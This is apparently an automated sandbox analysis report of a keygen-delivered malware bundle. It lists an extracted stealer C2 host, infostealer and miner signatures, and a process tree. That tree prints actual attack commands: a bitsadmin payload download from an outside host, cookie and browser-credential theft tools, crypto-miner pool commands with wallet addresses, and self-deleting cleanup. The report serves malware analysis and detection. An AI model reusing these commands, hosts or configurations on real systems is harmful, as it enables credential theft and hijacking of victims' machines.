Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1800s
  • max time network
    1800s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    28-04-2021 04:33

General

Malware Config

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Signatures

  • Fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Turns off Windows Defender SpyNet reporting 2 TTPs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 3 IoCs
  • Blocklisted process makes network request 11 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 13 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 14 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 20 IoCs
  • Suspicious use of SetThreadContext 13 IoCs
  • autoit_exe 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 37 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 59 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2692
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2676
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2576
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2376
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2356
        • C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe
          "C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe"
          1⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:3724
          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
            2⤵
            • Executes dropped EXE
            • Drops file in Program Files directory
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:2572
            • C:\Windows\SysWOW64\rundll32.exe
              "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
              3⤵
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:200
          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:3736
          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:196
            • C:\Users\Admin\AppData\Local\Temp\is-FSDV7.tmp\Install.tmp
              "C:\Users\Admin\AppData\Local\Temp\is-FSDV7.tmp\Install.tmp" /SL5="$5007A,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
              3⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:3948
              • C:\Users\Admin\AppData\Local\Temp\is-9A6LL.tmp\Ultra.exe
                "C:\Users\Admin\AppData\Local\Temp\is-9A6LL.tmp\Ultra.exe" /S /UID=burnerch1
                4⤵
                • Drops file in Drivers directory
                • Executes dropped EXE
                • Adds Run key to start application
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:2408
                • C:\Program Files\Windows Security\CQBXVJEPUK\ultramediaburner.exe
                  "C:\Program Files\Windows Security\CQBXVJEPUK\ultramediaburner.exe" /VERYSILENT
                  5⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:3404
                  • C:\Users\Admin\AppData\Local\Temp\is-6BHMD.tmp\ultramediaburner.tmp
                    "C:\Users\Admin\AppData\Local\Temp\is-6BHMD.tmp\ultramediaburner.tmp" /SL5="$5018A,281924,62464,C:\Program Files\Windows Security\CQBXVJEPUK\ultramediaburner.exe" /VERYSILENT
                    6⤵
                    • Executes dropped EXE
                    • Drops file in Program Files directory
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of WriteProcessMemory
                    PID:3168
                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                      "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                      7⤵
                      • Executes dropped EXE
                      PID:2132
                • C:\Users\Admin\AppData\Local\Temp\e8-8d79d-cb2-5dfa5-a68e9cf3e597d\Putaediqena.exe
                  "C:\Users\Admin\AppData\Local\Temp\e8-8d79d-cb2-5dfa5-a68e9cf3e597d\Putaediqena.exe"
                  5⤵
                  • Executes dropped EXE
                  • Checks computer location settings
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2440
                • C:\Users\Admin\AppData\Local\Temp\36-4ed90-95a-66985-21bfd9e64ae5b\Kaebutetygu.exe
                  "C:\Users\Admin\AppData\Local\Temp\36-4ed90-95a-66985-21bfd9e64ae5b\Kaebutetygu.exe"
                  5⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:1120
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rctjkdys.vas\skipper.exe /s & exit
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4700
                    • C:\Users\Admin\AppData\Local\Temp\rctjkdys.vas\skipper.exe
                      C:\Users\Admin\AppData\Local\Temp\rctjkdys.vas\skipper.exe /s
                      7⤵
                        PID:4980
                        • C:\Users\Admin\AppData\Local\Temp\322481316.exe
                          C:\Users\Admin\AppData\Local\Temp\322481316.exe
                          8⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:4468
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                            C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                            9⤵
                              PID:4540
                          • C:\Users\Admin\AppData\Local\Temp\466274559.exe
                            C:\Users\Admin\AppData\Local\Temp\466274559.exe
                            8⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:5060
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                              C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                              9⤵
                                PID:4616
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\rctjkdys.vas\skipper.exe & exit
                              8⤵
                                PID:4956
                                • C:\Windows\SysWOW64\PING.EXE
                                  ping 0
                                  9⤵
                                  • Runs ping.exe
                                  PID:1700
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kk1z5hii.eez\001.exe & exit
                            6⤵
                            • Suspicious use of WriteProcessMemory
                            PID:4876
                            • C:\Users\Admin\AppData\Local\Temp\kk1z5hii.eez\001.exe
                              C:\Users\Admin\AppData\Local\Temp\kk1z5hii.eez\001.exe
                              7⤵
                              • Executes dropped EXE
                              PID:5088
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hxo5gmnh.vdx\gpooe.exe & exit
                            6⤵
                              PID:4512
                              • C:\Users\Admin\AppData\Local\Temp\hxo5gmnh.vdx\gpooe.exe
                                C:\Users\Admin\AppData\Local\Temp\hxo5gmnh.vdx\gpooe.exe
                                7⤵
                                • Executes dropped EXE
                                • Adds Run key to start application
                                PID:4748
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  8⤵
                                  • Executes dropped EXE
                                  PID:5012
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  8⤵
                                    PID:2100
                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    8⤵
                                    • Executes dropped EXE
                                    PID:5548
                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    8⤵
                                    • Executes dropped EXE
                                    PID:4244
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\exu4kayt.bp0\google-game.exe & exit
                                6⤵
                                  PID:4448
                                  • C:\Users\Admin\AppData\Local\Temp\exu4kayt.bp0\google-game.exe
                                    C:\Users\Admin\AppData\Local\Temp\exu4kayt.bp0\google-game.exe
                                    7⤵
                                      PID:5168
                                      • C:\Windows\SysWOW64\rundll32.exe
                                        "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                        8⤵
                                        • Loads dropped DLL
                                        • Modifies registry class
                                        PID:5384
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2mdp01ea.1ng\md1_1eaf.exe & exit
                                    6⤵
                                      PID:5080
                                      • C:\Users\Admin\AppData\Local\Temp\2mdp01ea.1ng\md1_1eaf.exe
                                        C:\Users\Admin\AppData\Local\Temp\2mdp01ea.1ng\md1_1eaf.exe
                                        7⤵
                                        • Executes dropped EXE
                                        • Checks whether UAC is enabled
                                        PID:5268
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wttxdc52.f4s\HookSetp.exe /silent & exit
                                      6⤵
                                        PID:4528
                                        • C:\Users\Admin\AppData\Local\Temp\wttxdc52.f4s\HookSetp.exe
                                          C:\Users\Admin\AppData\Local\Temp\wttxdc52.f4s\HookSetp.exe /silent
                                          7⤵
                                          • Executes dropped EXE
                                          PID:5412
                                          • C:\Users\Admin\AppData\Roaming\4054384.exe
                                            "C:\Users\Admin\AppData\Roaming\4054384.exe"
                                            8⤵
                                              PID:3352
                                              • C:\ProgramData\Windows Host\Windows Host.exe
                                                "C:\ProgramData\Windows Host\Windows Host.exe"
                                                9⤵
                                                • Executes dropped EXE
                                                PID:3204
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mahrszn4.sv1\askinstall39.exe & exit
                                          6⤵
                                            PID:5344
                                            • C:\Users\Admin\AppData\Local\Temp\mahrszn4.sv1\askinstall39.exe
                                              C:\Users\Admin\AppData\Local\Temp\mahrszn4.sv1\askinstall39.exe
                                              7⤵
                                              • Executes dropped EXE
                                              PID:6040
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd.exe /c taskkill /f /im chrome.exe
                                                8⤵
                                                  PID:5424
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /f /im chrome.exe
                                                    9⤵
                                                    • Kills process with taskkill
                                                    PID:5096
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r3cwksgb.c1x\requête.exe & exit
                                              6⤵
                                                PID:4088
                                                • C:\Users\Admin\AppData\Local\Temp\r3cwksgb.c1x\requête.exe
                                                  C:\Users\Admin\AppData\Local\Temp\r3cwksgb.c1x\requête.exe
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:4864
                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"
                                                    8⤵
                                                      PID:5168
                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                        parse.exe -f json -b firefox
                                                        9⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        PID:4356
                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                        parse.exe -f json -b edge
                                                        9⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        PID:2644
                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                        parse.exe -f json -b chrome
                                                        9⤵
                                                          PID:4044
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\opddjcxf.zbh\SunLabsPlayer.exe /S & exit
                                                    6⤵
                                                      PID:5640
                                                      • C:\Users\Admin\AppData\Local\Temp\opddjcxf.zbh\SunLabsPlayer.exe
                                                        C:\Users\Admin\AppData\Local\Temp\opddjcxf.zbh\SunLabsPlayer.exe /S
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Drops file in Program Files directory
                                                        PID:4208
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw47CA.tmp\tempfile.ps1"
                                                          8⤵
                                                          • Blocklisted process makes network request
                                                          • Executes dropped EXE
                                                          PID:4980
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw47CA.tmp\tempfile.ps1"
                                                          8⤵
                                                            PID:4788
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw47CA.tmp\tempfile.ps1"
                                                            8⤵
                                                              PID:5100
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw47CA.tmp\tempfile.ps1"
                                                              8⤵
                                                                PID:5344
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw47CA.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:5956
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw47CA.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:5960
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw47CA.tmp\tempfile.ps1"
                                                                    8⤵
                                                                    • Checks for any installed AV software in registry
                                                                    PID:4304
                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                    "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                    8⤵
                                                                    • Download via BitsAdmin
                                                                    PID:6092
                                                                    • C:\Windows\System32\Conhost.exe
                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      9⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                      PID:4044
                                                                  • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                    "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pLZQiSM75KRmgEsZ -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    • Drops file in Program Files directory
                                                                    PID:5352
                                                                  • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                    "C:\Program Files (x86)\lighteningplayer\data_load.exe" -plIt7BMSl5CGLPUK -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    PID:4316
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw47CA.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:5544
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw47CA.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:4008
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw47CA.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:6012
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw47CA.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:5364
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw47CA.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:4760
                                                                              • C:\Windows\System32\Conhost.exe
                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                9⤵
                                                                                  PID:5344
                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\HjhHaWQ\HjhHaWQ.dll" HjhHaWQ
                                                                                8⤵
                                                                                • Loads dropped DLL
                                                                                PID:3980
                                                                                • C:\Windows\system32\rundll32.exe
                                                                                  C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\HjhHaWQ\HjhHaWQ.dll" HjhHaWQ
                                                                                  9⤵
                                                                                  • Loads dropped DLL
                                                                                  • Drops file in System32 directory
                                                                                  PID:5052
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw47CA.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:5296
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw47CA.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:4348
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw47CA.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                    • Drops file in Program Files directory
                                                                                    PID:3776
                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      9⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      • Checks SCSI registry key(s)
                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                      PID:5800
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw47CA.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:2100
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw47CA.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                    • Blocklisted process makes network request
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    • Drops file in Program Files directory
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:5168
                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      9⤵
                                                                                        PID:5428
                                                                                    • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                      "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                      8⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      PID:4732
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wv24m2qi.s3b\005.exe & exit
                                                                                  6⤵
                                                                                    PID:1236
                                                                                    • C:\Users\Admin\AppData\Local\Temp\wv24m2qi.s3b\005.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\wv24m2qi.s3b\005.exe
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:4744
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mn0mq5pw.2pa\GcleanerWW.exe /mixone & exit
                                                                                    6⤵
                                                                                      PID:4900
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0i3nprfw.fyk\toolspab1.exe & exit
                                                                                      6⤵
                                                                                        PID:4304
                                                                                        • C:\Users\Admin\AppData\Local\Temp\0i3nprfw.fyk\toolspab1.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\0i3nprfw.fyk\toolspab1.exe
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:5116
                                                                                          • C:\Users\Admin\AppData\Local\Temp\0i3nprfw.fyk\toolspab1.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\0i3nprfw.fyk\toolspab1.exe
                                                                                            8⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            • Checks SCSI registry key(s)
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:3952
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qduc0af3.3zo\c7ae36fa.exe & exit
                                                                                        6⤵
                                                                                          PID:4372
                                                                                          • C:\Users\Admin\AppData\Local\Temp\qduc0af3.3zo\c7ae36fa.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\qduc0af3.3zo\c7ae36fa.exe
                                                                                            7⤵
                                                                                              PID:5800
                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Modifies data under HKEY_USERS
                                                                                    • Modifies system certificate store
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:2636
                                                                                    • C:\Users\Admin\AppData\Roaming\9792.tmp.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\9792.tmp.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:4224
                                                                                      • C:\Users\Admin\AppData\Roaming\9792.tmp.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\9792.tmp.exe"
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4556
                                                                                    • C:\Users\Admin\AppData\Roaming\9B1E.tmp.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\9B1E.tmp.exe"
                                                                                      3⤵
                                                                                        PID:4440
                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                          -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w27182@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                          4⤵
                                                                                            PID:4840
                                                                                          • C:\Windows\system32\msiexec.exe
                                                                                            -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w5685 --cpu-max-threads-hint 50 -r 9999
                                                                                            4⤵
                                                                                            • Blocklisted process makes network request
                                                                                            PID:4620
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                          3⤵
                                                                                            PID:5428
                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                              ping 127.0.0.1
                                                                                              4⤵
                                                                                              • Runs ping.exe
                                                                                              PID:4444
                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks whether UAC is enabled
                                                                                          PID:4968
                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:3956
                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                            3⤵
